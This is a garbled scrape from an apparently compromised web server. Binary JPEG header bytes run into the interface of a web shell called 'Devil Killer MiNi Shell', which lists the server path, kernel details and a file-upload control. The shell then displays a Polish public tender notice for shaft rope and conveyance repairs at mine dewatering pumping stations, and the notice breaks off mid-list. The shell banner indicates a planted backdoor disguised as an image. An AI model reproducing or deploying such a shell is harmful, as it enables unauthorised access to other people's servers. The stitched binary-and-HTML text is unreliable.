JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160422/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160422/100814-N-2016.html

<p class="kh_header"><b>Bytom: Roboty szybowe w Centralnym Zakładzie Odwadniania Kopalń w Czeladzi</b><br>
<b>Numer ogłoszenia: 100814 - 2016; data zamieszczenia: 22.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółka Restrukturyzacji Kopalń S.A. , ul. Strzelców Bytomskich 207, 41-914 Bytom, woj. śląskie, tel. 032 3513300, 3513301, 3513364, faks 032 3513309, -10, 3513369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednoosobowa Spółka Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty szybowe w Centralnym Zakładzie Odwadniania Kopalń w Czeladzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty szybowe w Centralnym Zakładzie Odwadniania Kopalń w Czeladzi 
Część I:	Wymiana zawieszeń lin nośnych w szybie Staszic - Pompownia Pstrowski
Część II: 	Wykonanie skracania lin nośnych wraz z przygotowaniem do kontroli lin nośnych w zawiesiach - szyb Ewa - Pompownia Szombierki
Część III: 	Wymiana zawieszeń liny nośnej naczyń wyciągowych wlk. 6 - Pompownia Dębieńsko
Część IV:	Przygotowanie do kontroli liny nośnej w zawieszeniu górniczego wyciągu szybowego szybu Kolejowy I - Pompownia Siemianowice
Część V: 	Remont naczyń wyciągowych szybu Jan III - Pompownia Dębieńsko.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta powinna być zabezpieczona wadium w wysokości: 
Cześć I -   1 700,00 zł (słownie: jeden tysiąc siedemset złotych 00/100)
Cześć II -  1 500,00 zł (słownie: jeden tysiąc pięćset złotych 00/100)
Cześć III - 1 700,00 zł (słownie: jeden tysiąc siedemset złotych 00/100)
Cześć IV - 1 600,00 zł (słownie: jeden tysiąc sześćset złotych 00/100)
Cześć V -   2 300,00 zł (słownie: dwa tysiące trzysta złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek w zakresie wiedzy i doświadczenia za spełniony, jeżeli  Wykonawca wykaże się należytym wykonaniem głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w tym co najmniej jedną usługą w ramach jednej umowy polegającą na wymianie zawieszeń lin nośnych dla Części I - IV oraz remoncie naczyń wyciągowych dla Części V o wartości minimum 30 000,00 zł brutto w zakresie Części I, II, III, IV, V wraz z dowodami realizacji wszystkich usług ujętych  w wykazie.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów                  do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek w zakresie dysponowania osobami za spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami zdolnymi do realizacji zadania objętego zamówieniem posiadającymi uprawnienia w zakresie:
osoby kierownika działu energomechanicznego - 1 osoba dla każdej części zamówienia 
osoby wyższego dozoru ruchu szybowego - 1 osoba na zmianę w zakresie każdej części zamówienia
osoba średniego dozoru ruchu szybowego - 1 osoba na zmianę w zakresie każdej części zamówienia
pracowników brygad w zakresie każdej części zamówienia w których składzie będą osoby w ilości niezbędnej do realizacji zadania z uprawnieniami: cieśli lub górnika szybowego, rewidenta, spawacza, ślusarza, obsługi wciągarek do transportu pionowego itp. (świadectwa przedłoży Zamawiającemu przed przystąpieniem do prac).
UWAGA: stanowiska osoby wyższego i średniego dozoru ruchu szybowego można łączyć pod warunkiem spełnienia wymogów przepisów górniczych związanych z nadzorem nad robotami objętymi przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oświadczenia Wykonawcy w trybie art. 44 ustawy Pzp w związku z art. 22 ust.1
ustawy Pzp zgodnie z pkt. 5.1. SIWZ - załączniki nr 2, 2a, 2b, 2c, 2d do druku OFERTA.   
Wykonawca powołujący się przy wykazaniu spełniania warunków udziału                            w postępowaniu w zakresie wiedzy i doświadczenia, potencjału technicznego, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów (załączniki nr 2a, 2b, 2c, 2d), zobowiązany jest uzyskać pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, które należy dołączyć do załączników nr 2a, 2b, 2c, 2d do druku OFERTA. 
Wzór zobowiązania podmiotu trzeciego stanowi załącznik nr 2e do druku OFERTA               
2. Wykonawca w druku OFERTA - załącznik nr 1 do druku SIWZ zobowiązany jest złożyć zobowiązanie z tytułu gwarancji zgodnie z pkt. III ppkt. 1 załącznika nr 2                 do  SIWZ.
3. Wykonawca zobowiązany jest przedłożyć kopię wdrożonego i certyfikowanego przez jednostkę notyfikowaną system zarządzania jakością w przedmiocie zamówienia. 
4. Wykonawca zobowiązany jest przedłożyć dokument potwierdzający spełnienie jednego z wymagań opisanych w pkt. II ppkt. 3 Załącznika nr 2 do SIWZ (Część V) 
5. Wykonawca zobowiązany jest do złożenia w ofercie Oświadczenia - 
załącznik nr 8 do druku OFERTA, iż nie będzie zatrudniał osób korzystających z urlopów górniczych albo urlopu dla pracowników zakładu przeróbki mechanicznej zgodnie z opisem w pkt. III ppkt 5 załącznika nr 2 do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem ustawowej zmiany obowiązującej stawki podatku od towarów i usług</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SRK S.A. ul. Strzelców Bytomskich 207, 41-914 Bytom-30,00+VAT w przypadku odbioru osobistego (gotówka) lub pocztą (za zaliczeniem)- w przypadku pobrania SIWZ ze strony internetowej-bezpłatnie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.05.2016 godzina 10:00, miejsce: Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul. Strzelców Bytomskich 207 - sekretariat Spółki (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PODWYKONAWSTWO

1.	Informacja o obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia: 
1.	Zamawiający nie wprowadza żadnych ograniczeń odnośnie zakresu prac, których wykonanie Wykonawca zamierza powierzyć podwykonawcy
2.	Powierzenie części zamówienia podwykonawcy:
1.	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
2.	Zamawiający żąda wskazania przez Wykonawcę w ofercie - Załącznik nr 5 - części zamówienia, której wykonanie zamierza powierzyć podwykonawcy lub podania przez Wykonawcę nazw (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1.
3.	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa 
w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie, na dzień zgłoszenia zmiany, spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I:	Wymiana zawieszeń lin nośnych w szybie Staszic - Pompownia Pstrowski.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wymiana zawieszeń lin nośnych w szybie Staszic - Pompownia Pstrowski

2.1.	Zamawiający nie dopuszcza możliwości podnoszenia nadwagi przy wykorzystaniu silnika maszyny wyciągowej. 
2.2.	Na wykonanie wymiany zawieszeń Wykonawca zobowiązany jest do opracowania szczegółowej technologii, uwzględniającej obowiązujące w tym zakresie  przepisy                  i warunki dopuszczeniowe zastosowanych urządzeń do w/w prac oraz uzyskania jej zatwierdzenia przez KRZG Oddziału CZOK. 
2.3.	W technologii należy uwzględnić:
2.3.1	Wykonywanie prac przez wykorzystanie urządzenia do podnoszenia nadwagi posiadające dopuszczenie WUG.
2.3.2	Transport i ustawienie urządzeń do wymiany 2 kpl. zawieszeń jednolinowych nośnych naczyń wyciągowych wlk.4 wraz z trzonami głównymi w górniczym wyciągu szybowym szybu Staszic.
2.3.3	Przygotowanie urządzeń i osprzętu do wymiany zawieszeń.
2.3.4	Przygotowanie szybu do wymiany zawieszeń.
2.3.5	Posadowienie naczyń wyciągowych.
2.3.6	Demontaż zawieszeń.
2.3.7	Montaż zawieszeń lin nośnych naczyń wyciągowych wraz z konserwacją wszystkich połączeń przegubowych, sercówek i lin w zawieszeniach oraz kieszeni trzonów głównych.
2.3.8	Wykonanie niezbędnych skróceń liny nośnej.
2.3.9	Wszelkie prace związane z wymianą zawieszeń nośnych naczyń wyciągowych za wyjątkiem obsługi maszyny wyciągowej i obsługi sygnalizacji szybowej.
2.3.10	Demontaż urządzeń i osprzętu po wymianie.
2.3.11	Przygotowanie szybu  do ruchu (tj. przeprowadzenie jazd próbnych, kontrola zawieszeń)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 03.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II
Wykonanie skracania lin nośnych wraz z przygotowaniem do kontroli lin nośnych                  w zawiesiach - szyb Ewa - Pompownia Szombierki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.	Wykonanie skracania lin nośnych wraz z przygotowaniem do kontroli lin nośnych                            w zawiesiach - szyb Ewa - Pompownia Szombierki
2.1.	Zamawiający nie dopuszcza możliwości podnoszenia nadwagi przy wykorzystaniu silnika maszyny wyciągowej.
2.2.	Na wykonanie skracania lin nośnych zabudowanych w szybie Ewa wraz                                   z przygotowaniem do kontroli końcówek lin nośnych w zawieszeniach Wykonawca zobowiązany jest do opracowania szczegółowej technologii, uwzględniającej obowiązujące w tym zakresie  przepisy i warunki dopuszczeniowe zastosowanych urządzeń do w/w prac oraz uzyskania jej zatwierdzenia przez  KRZG Oddziału CZOK. 
2.3.	W technologii uwzględnić wykonywanie prac przez wykorzystanie urządzenia do podnoszenia nadwagi posiadające dopuszczenie WUG lub ocenę wyrobu wydaną przez jednostkę posiadającą wymaganą akredytację.
2.4.	Zakres rzeczowy:
2.4.1	Wykonanie niezbędnych prac przygotowawczych, transportu, zabudowy oraz przygotowania  urządzeń i osprzętu do wykonania skrócenia oraz kontroli lin nośnych w zawieszeniach.
2.4.2	Wszystkie prace winny być wykonane ściśle według  zaleceń określonych w DTR producenta zawieszeń, ze szczególnym uwzględnieniem warunków mocowania lin nośnych w zawieszeniu.
2.4.3	Przygotowanie szybu do realizacji zadania a w szczególności: posadzenie naczyń wyciągowych, zabudowa sań prowadniczych itp. 
2.4.4	Prace związane z realizacją zadania obejmują między innymi: uwolnienie lin nośnych, przygotowanie do badania oraz konserwacja elementów zawieszenia.  Wszystkie prace winny być wykonane ściśle według  zaleceń określonych w DTR producenta zawieszeń, ze szczególnym uwzględnieniem warunków mocowania lin nośnych  w zawieszeniu.
2.4.5	Wykonanie korekty długości lin nośnych przed jej skracaniem. 
2.4.6	Wykonanie wszelkich prac związanych z przedmiotem zadania za wyjątkiem obsługi stanowisk - maszynista wyciągowy i sygnalista obsługi szybu Ewa.
2.4.7	Demontaż urządzeń i osprzętu po wykonaniu zakresu robót.
2.4.8	Przygotowanie szybu  do ruchu (tj. przeprowadzenie jazd próbnych, kontrola zawieszeń )..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III
Wymiana zawieszeń liny nośnej naczyń wyciągowych wlk. 6 - Pompownia Dębieńsko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dane techniczne szybu i wyciągu szybowego szybu Jan III:
Przeznaczenie:
Wyciąg szybowy szybu Jan III: dwunaczyniowy, klatkowy, przeznaczony do jazdy ludzi, i transportu materiałów.
Szyb, wieża wyciągowa.
Szyb Jan III jest szybem pionowym, wdechowym, jednoprzedziałowym. Średnica szybu wynosi od 5,1 m do 5,77 m, głębokość: 690 m + 20 m do sztucznego dna. Obudowa szybu: murowa. Prowadzenie naczyń: sztywne, dwustronne, czołowe. Zbrojenie szybu: prowadniki stalowe, dźwigary główne stalowe 162x100. Wloty szybowe zabezpieczone wrotami szybowymi skrzydłowymi, uruchamianymi ręcznie.
Wieża stalowa, jednozastrzałowa, średnica kół linowych: 6000 mm.
Maszyna wyciągowa.
Maszyna wyciągowa typu K-6000/1600 produkcji ZUT Zgoda Świętochłowice, usytuowana obok szybu, na powierzchni, napędzana silnikiem elektrycznym prądu stałego o mocy 1600 kW. Maszyna wyciągowa posiada koło pędne jednolinowe z wykładziną Modar o średnicy 6000 mm. Układ hamulcowy powietrzno-ciężarowy.
Maksymalne prędkość jazdy przy:
jeździe ludzi:	  6,0 m/s
transporcie materiałów:	10,0 m/s.
Naczynia wyciągowe i zawieszenia.
Dwie klatki 4 piętrowe wyposażone w prowadnice ślizgowe i toczne.
Zawieszenia nośne naczyń wyciągowych z zaciskiem liny wielkość 6.
Zawieszenia klinowe liny wyrównawczej płaskiej stalowo-gumowej produkcji Sadex                    Sp. z o. o. wielkość 5.
Liny wyciągowe.
Jedna lina nośna okrągła, o średnicy 62 mm.
Jedna lina wyrównawcza płaska, stalowo-gumowa typu SAG szer x gr.: 188 x 35 mm.

Zakres prac.
Opracowanie technologii i Projektu organizacji robót.
Wykonanie niezbędnych prac przygotowawczych, transport, zabudowa i przygotowanie urządzeń i osprzętu do wymiany zawieszeń liny nośnej naczyń wyciągowych .
Wykonanie wszelkich prace związanych z przedmiotem zadania za wyjątkiem obsługi  maszyny wyciągowej i sygnalizacji szybu Jan III.
Demontaż urządzeń i osprzętu po wykonaniu zakresu robót.
Przygotowanie szybu do oddania do ruchu (tj. przeprowadzenie jazd próbnych)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 02.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV
Przygotowanie do kontroli liny nośnej w zawieszeniu górniczego wyciągu szybowego szybu Kolejowy I - Pompownia Siemianowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.	Zakres prac.
2.1.	Zamawiający nie dopuszcza możliwości podnoszenia nadwagi przy wykorzystaniu silnika maszyny wyciągowej.
2.2.	Celem wykonania wymiany zawieszeń Wykonawca zobowiązany jest do opracowania szczegółowej technologii, uwzględniającej obowiązujące w tym zakresie przepisy                          i warunki dopuszczeniowe zastosowanych urządzeń do w/w prac oraz uzyskania jej zatwierdzenia przez KRZG Oddziału CZOK. 
2.3.	W technologii należy uwzględnić: 
2.3.1	Transport i ustawienie urządzeń do kontroli liny nośnej w zawieszeniu                                w górniczym wyciągu szybowym szybu Kolejowy I. 
2.3.2	Przygotowanie urządzeń i osprzętu do kontroli liny nośnej w zawieszeniu. 
2.3.3	Przygotowanie szybu do kontroli liny nośnej w zawieszeniu. 
2.3.4	Posadowienie naczyń wyciągowych. 
2.3.5	Demontaż zawieszeń. 
